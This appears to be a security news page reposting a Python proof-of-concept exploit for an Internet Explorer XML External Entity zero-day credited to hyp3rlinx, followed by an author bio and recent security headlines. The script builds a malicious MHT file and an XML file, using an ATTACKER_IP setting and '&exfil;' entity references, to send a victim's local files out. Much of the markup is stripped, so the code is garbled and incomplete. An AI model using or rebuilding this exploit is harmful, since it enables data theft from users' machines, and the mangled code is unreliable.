Categories: Uncategorized

Internet Explorer Zero-day Exploit code

ATTACKER_IP=”localhost”
PORT=”8000″

mht_file=(
‘From:\n’
‘Subject:\n’
‘Date:\n’
‘MIME-Version: 1.0\n’
‘Content-Type: multipart/related; type=”text/html”;\n’
‘\tboundary=”=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001″\n’
‘This is a multi-part message in MIME format.\n\n\n’

‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n’
‘Content-Type: text/html; charset=”UTF-8″\n’
‘Content-Location: main.htm\n\n’

‘\n’
‘\n’ ‘\n’ ‘\n’ ‘MSIE XXE 0day\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘%sp;\n’ ‘%param1;\n’ ‘]>\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘&exfil;\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘\n’ ‘

\n’ ‘MSIE XML External Entity 0day PoC.\n’ ‘Discovery: hyp3rlinx\n’ ‘ApparitionSec\n’ ‘

\n’ ‘\n’ ‘\n\n\n’

‘–=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001–‘
)

xml_file=(
‘\n’
‘”>\n’
‘\n’
‘”>\n’
)

def mk_msie_0day_filez(f,p):
f=open(f,”wb”)
f.write(p)
f.close()

if name == “main“:
mk_msie_0day_filez(“msie-xxe-0day.mht”,mht_file)
mk_msie_0day_filez(“datatears.xml”,xml_file)
print “Microsoft Internet Explorer XML External Entity 0day PoC.”
print “Files msie-xxe-0day.mht and datatears.xml Created!.”
print “Discovery: Hyp3rlinx / Apparition Security”

Credits: John Page (aka hyp3rlinx)

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Cisco IOS, XE, and XR Vulnerability Allows Remote Device Reboots

 Cisco has issued an urgent security advisory (cisco-sa-twamp-kV4FHugn) warning of a critical vulnerability in its…

51 minutes ago

OpenCTI: Free Cyber Threat Intelligence Platform for Security Experts

OpenCTI (Open Cyber Threat Intelligence) stands out as a free, open source platform specifically designed…

2 hours ago

LockBit Ransomware Group Breached: Internal Chats and Data Leaked Online

The notorious LockBit ransomware group, once considered one of the world’s most prolific cyber extortion…

4 hours ago

Cisco IOS XE Wireless Controllers Vulnerability Lets Attackers Seize Full Control

A critical security flaw has been discovered in Cisco IOS XE Wireless LAN Controllers (WLCs),…

4 hours ago

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector emerged…

19 hours ago

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its attacks…

19 hours ago